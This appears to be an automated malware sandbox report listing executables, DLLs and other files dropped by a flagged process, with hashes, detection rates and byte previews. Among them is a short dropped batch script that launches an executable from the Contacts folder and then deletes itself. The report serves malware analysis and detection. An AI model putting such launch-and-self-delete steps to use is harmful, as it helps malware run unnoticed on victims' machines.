                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@............@.....................................K.......p.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H.......T...\...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):1698
                                                            Entropy (8bit):5.367720686892084
                                                            Encrypted:false
                                                            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1GqZ4x
                                                            MD5:5E2B46F197ED0B7FCCD1F26C008C2CD1
                                                            SHA1:17B1F616C3D13F341565C71A7520BD788BCCC07D
                                                            SHA-256:AF902415FD3BA2B023D7ACE463D9EB77114FC3678073C0FFD66A1728578FD265
                                                            SHA-512:5E6CEEFD6744B078ADA7E188AEC87CD4EE7FDAD5A9CC661C8217AC0A177013370277A381DFE8FF2BC237F48A256E1144223451ED2EC292C00811C14204993B50
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:ASCII text, with very long lines (696), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):696
                                                            Entropy (8bit):5.900633508358525
                                                            Encrypted:false
                                                            SSDEEP:12:HpxwWUaiD2/KsY8o6JdxGez9emf0uYW9n2am0X6UWsjCWgrL5Ey3RUIKj:HgWUnjEoEdx/omfY30XHWUCzrLyaUhj
                                                            MD5:0505E50AA718C382870B6A9524387898
                                                            SHA1:C0B6D8D00202CA1155F308BA95F96EA5FD85BF14
                                                            SHA-256:763A0C28A91061B82C96A962DBB44E7163C64FDB6886C7ED4594FF013A510571
                                                            SHA-512:57FD122CA2990180BC422C8C5080C833334BA7835F8D680FC18E9B810E778AB21B796F02AFDFEB7A36FE8451748B1E3FA3901A7A6C3C86EB1E69CB6ECC63265C
                                                            Malicious:false
                                                            Preview:nxGpBUEOC3HlxGGSg2rPKkPPWbQH5z66Yf2M8h0MXxS4Zi1t6lOZZ8gDh0SjE7SN6LNRN3U9Ce2WRV0ykgKUlhhZ9zoIOQIZfF8OVkfDROW4GKwMAe9hx7lYoySYOMuvWc1LWmcAAGDWKnSyCbHtRllidjkgSHyEelinTlzYB9gq3PNBfdWwEAeu1SrxC5r3S82jEpfamsrRE5oOVjBzvBAdGxwA3CWFRnY4Xo6075KVSMq5ndcd42HQ8ZdR2fhjWlAbhu1rmL100oK4H0Wak3LYfH58Lo7cXl9qLOY3mu0tBRZUOiKCIG9dal6Zy3g8NZcPpds2bcyzDbXNrltmd5TRlfQkS9FsN1flzKpv0SkqSJa8NssNJ4fRFLoJMIkcXFlL6vYh67vLVn8bFRWjQ1jTWNgogfisrHSMhOCcULRLIT6cMME5vBLfgSzsPtBaZDdNVw30P4OFkXLCREbTbn6q5wqPZUMkJ0wEzsHaSNq1xF5JGwaLSr9vHxRiFoa4rn5ukGMi6BBN7F201hJn3ASc1A7CbiUowvJKJKi9j2ORpvyC4bqifxAqUd2kJKHYqXbL5sqq8JEBwBxGL5H92wI9vczqS80Yu0kRTmGMu9jVt84TpvYOCHf3Ocac3AYASpQ5afwiy5P2MwPwigAgjmVnUrD1MoTuliDEs82K9zZH2nqbMo4W91bq
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1300992
                                                            Entropy (8bit):5.0586566573608085
                                                            Encrypted:false
                                                            SSDEEP:24576:YJQCx441vcF3iE0npCoc1cQhWdB7in6D+:EQCvvcF3KpS
                                                            MD5:295BF8D9B734730EFA567C8DA9918FE1
                                                            SHA1:09AABC018DA124BD0EBE8E1043860015AC71AA34
                                                            SHA-256:7B17102103AF932A56EAC5EA51F07A7926BE23585D19B1CFE42215CE1A4FA3CC
                                                            SHA-512:C816F7F53F5FB24EB7DCF31B8138E6717C881245D7CC2FBD53F5DC99977F8D1CEF4D1AFE8235B5EF0EE4397CE32A1A74720349B21D805A7F6CEAC8BBC802A59C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 79%
                                                            • Antivirus: Virustotal, Detection: 69%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@............@.....................................K.......p.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H.......T...\...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):175
                                                            Entropy (8bit):5.175572355642595
                                                            Encrypted:false
                                                            SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1U9lEwYAfNHyBktKcKZG1Ukh4E2J5xAI+p4H:hCRLuVFOOr+DE1olSKOZG1923f+pK
                                                            MD5:4B484B4B5F2B9A6B45CFF925090291EF
                                                            SHA1:478A28087A025849F722EA237FD19C5D3E6B4F78
                                                            SHA-256:D02D3BF6564D23517300726E1A4FCB2C949A7E3700B70A9BD98E226557FF9CA8
                                                            SHA-512:A9701F6689ACCFF43ACF81AFAA657CDAAEC0CC3E17AC4569CA8FCD259CF32F05BA3D5C123F95535637D5ACB58F844CDED4DBE5A98FE5659507D01C5DBA0A2A87
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\XJsEcPfXWC.bat"
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):4.133660689688186
                                                            Encrypted:false
                                                            SSDEEP:3:zPhN9K4vtyQgn:jh2441
                                                            MD5:C5BD9470B83AF69B3B6BB6D6DC4AA763
                                                            SHA1:51C96FFDD6D383245588463BAE4C4D48FCA2D043
                                                            SHA-256:AA75D92D2296D1D304F31B1D5D1CB308312CF3A7670044CBE2D08D14B137B21C
                                                            SHA-512:14BC25C6AECFC5219ABBC0EAD7D4AF2771457387581BB4D09143888511DE215B9E5F83C46043DC24D24A8A2327D88C54A7FA512F7EF3D87521BB93B3BDA4D178
                                                            Malicious:false
                                                            Preview:otLEjn0huMOvrAlpht6vtHWuE
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:ASCII text, with very long lines (744), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):744
                                                            Entropy (8bit):5.896392545627124
                                                            Encrypted:false
                                                            SSDEEP:12:jOAhvl1WSJzeTNlw4z8eakeN56tZQ+jd33qgLQUDz7sf2Fm7T/h6w5OEoENg2wfZ:jV3EKyT0w8eamxqGQY8XTxYEok4m1Tjc
                                                            MD5:57EAE854B5DA95F1BE6521E8455D79CF
                                                            SHA1:BBBB4F3CD780E8E64254037D05B1024121FB2B16
                                                            SHA-256:28D1630FABF1F1BF12161E5AF8DB0EA7CD11899B320EE986976A037B18B1C2C9
                                                            SHA-512:777C7A4CF28D76E355D800B1A786BDB482A8B893A70BB24C65421604293A01C79495E47E7FCC3F7E78C5507E4880ED9424653435D1A5B093309B1234873A246D
                                                            Malicious:false
                                                            Preview:Co05NlEQowROTkKDEGpsnjKSu21mOUKj8BSBazpb9F8tSHLwUemNfbGdeiLVtcCTlrPRRJnObOthlbAmqFSus7Eg5zh1oTshDoHk13eL0XwRsi1CiionKRlonsWblvkHgLe6UZuxkH3ULwyW7eTFoEXwCd6IgDjFwougE5sIy1DCXQc149dGbfdcyr40cmQhhyihBRSCwLRwBUZvAFNgjcoRKSrWA1pLkffjs5znqbUQOqaeSI0XYu8FJQWsj6C4fFMfzzCFQkzIHYCe1NE1BSx0hZZciGEuYauJe5pcGuGx407vN21V2K2NRV8ZakhKgFtrn396ilvRL96rcnOpPs2Ohh1I7QBfN6RzHQHT24xQZlBRZR6wW14xMfJGC19SjPEPrGjMg4wU4ly6gjspTPJVBemlGBRB5fqKgvkSruQcEk2kqMjdIT9UGtNNe8FenvZZ5oZu9Z8i8qQblB43by3mgWDxiWytpwzTKdpCwzdsUaVZcvmcDLCy2w3jkmLmlP3M17QHW2HmUKRFAoVxuVpdtAbYkGbKn0GEhJhfeeGKEaerexi6QY2QjZc1g2hPa68dDNh1G0SPOfZTgt3whf3O80eIqq9l61uHbAoRQrzaGmCE9JVw9vs5CtfNsZLa1qTXuR2fFlgzpdIVyaIgVMlLIzFreaj0gZjZTpUrQzrYP2PjlKZSQoFoFIO5MKBoBpTQ3tBJFaQfeM5PkgGUBRj1T4TLaYfGyDXjj8p1
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1300992
                                                            Entropy (8bit):5.0586566573608085
                                                            Encrypted:false
                                                            SSDEEP:24576:YJQCx441vcF3iE0npCoc1cQhWdB7in6D+:EQCvvcF3KpS
                                                            MD5:295BF8D9B734730EFA567C8DA9918FE1
                                                            SHA1:09AABC018DA124BD0EBE8E1043860015AC71AA34
                                                            SHA-256:7B17102103AF932A56EAC5EA51F07A7926BE23585D19B1CFE42215CE1A4FA3CC
                                                            SHA-512:C816F7F53F5FB24EB7DCF31B8138E6717C881245D7CC2FBD53F5DC99977F8D1CEF4D1AFE8235B5EF0EE4397CE32A1A74720349B21D805A7F6CEAC8BBC802A59C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 79%
                                                            • Antivirus: Virustotal, Detection: 69%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@............@.....................................K.......p.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H.......T...\...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33792
                                                            Entropy (8bit):5.541771649974822
                                                            Encrypted:false
                                                            SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                            MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                            SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                            SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                            SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                            • Antivirus: Virustotal, Detection: 4%, Browse
                                                            Joe Sandbox View:
                                                            • Filename: LabyMod.exe, Detection: malicious, Browse
                                                            • Filename: jWPW3CjSsa.exe, Detection: malicious, Browse
                                                            • Filename: 6v2t5igkn8.exe, Detection: malicious, Browse
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            • Filename: 68ebff4655ce8e3641602b31a0f12adcd4f5d0813604655a309fd881.exe, Detection: malicious, Browse
                                                            • Filename: Sentares_Hack_#U2014_#U043a#U043e#U043f#U0438#U044f.exe, Detection: malicious, Browse
                                                            • Filename: LYOTMT26Vl.exe, Detection: malicious, Browse
                                                            • Filename: 4J576dHwVU.exe, Detection: malicious, Browse
                                                            • Filename: sw9ofrTPS0.exe, Detection: malicious, Browse
                                                            • Filename: jHednJXHgj.exe, Detection: malicious, Browse
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):5.660491370279985
                                                            Encrypted:false
                                                            SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                            MD5:240E98D38E0B679F055470167D247022
                                                            SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                            SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                            SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            • Antivirus: Virustotal, Detection: 9%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):69632
                                                            Entropy (8bit):5.932541123129161
                                                            Encrypted:false
                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            • Antivirus: Virustotal, Detection: 13%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):64000
                                                            Entropy (8bit):5.857602289000348
                                                            Encrypted:false
                                                            SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                            MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                            SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                            SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                            SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            • Antivirus: Virustotal, Detection: 4%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):23552
                                                            Entropy (8bit):5.519109060441589
                                                            Encrypted:false
                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            • Antivirus: Virustotal, Detection: 7%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):46592
                                                            Entropy (8bit):5.870612048031897
                                                            Encrypted:false
                                                            SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                            MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                            SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                            SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                            SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            • Antivirus: Virustotal, Detection: 7%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):85504
                                                            Entropy (8bit):5.8769270258874755
                                                            Encrypted:false
                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 34%
                                                            • Antivirus: Virustotal, Detection: 33%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):85504
                                                            Entropy (8bit):5.8769270258874755
                                                            Encrypted:false
                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 34%
                                                            • Antivirus: Virustotal, Detection: 33%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):5.629584586954759
                                                            Encrypted:false
                                                            SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                            MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                            SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                            SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                            SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            • Antivirus: Virustotal, Detection: 4%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):34304
                                                            Entropy (8bit):5.618776214605176
                                                            Encrypted:false
                                                            SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                            MD5:9B25959D6CD6097C0EF36D2496876249
                                                            SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                            SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                            SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                            • Antivirus: Virustotal, Detection: 4%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):70144
                                                            Entropy (8bit):5.909536568846014
                                                            Encrypted:false
                                                            SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                            MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                            SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                            SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                            SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                            • Antivirus: Virustotal, Detection: 4%, Browse
